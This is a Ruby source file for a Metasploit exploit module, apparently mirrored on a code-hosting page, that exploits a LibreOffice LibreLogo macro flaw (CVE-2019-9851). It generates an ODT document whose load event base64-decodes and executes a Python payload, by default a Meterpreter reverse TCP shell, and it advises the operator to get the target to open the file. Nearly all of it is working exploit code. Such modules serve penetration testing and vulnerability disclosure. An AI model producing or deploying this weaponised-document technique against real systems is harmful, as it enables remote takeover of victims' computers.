Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'LibreOffice Macro Python Code Execution',

16
        'Description' => %q{

17
          LibreOffice comes bundled with sample macros written in Python and

18
          allows the ability to bind program events to them.

19


20
          LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.

21


22
          This module generates an ODT file with a dom loaded event that,

23
          when triggered, will execute arbitrary python code and the metasploit payload.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Nils Emmerich', # Vulnerability discovery and PoC

28
          'Shelby Pace',      # Base module author (CVE-2018-16858), module reviewer and platform-independent code

29
          'LoadLow',          # This msf module

30
          'Gabriel Masei'     # Global events vuln. disclosure

31
        ],

32
        'References' => [

33
          [ 'CVE', '2019-9851' ],

34
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],

35
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],

36
          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]

37
        ],

38
        'DisclosureDate' => '2019-07-16',

39
        'Platform' => 'python',

40
        'Arch' => ARCH_PYTHON,

41
        'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },

42
        'Targets' => [ ['Automatic', {}] ],

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),

55
        OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),

56
      ]

57
    )

58
  end

59


60
  def gen_file

61
    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])

62
    py_code = Rex::Text.encode_base64(payload.encoded)

63
    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"

64
    @cmd = Rex::Text.html_encode(@cmd)

65


66
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))

67
    libre_file = ERB.new(fodt_file).result(binding())

68


69
    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")

70


71
    libre_file

72
  rescue Errno::ENOENT

73
    fail_with(Failure::NotFound, 'Cannot find template file')

74
  end

75


76
  def exploit

77
    fodt_file = gen_file

78


79
    file_create(fodt_file)

80
  end

81
end

82


83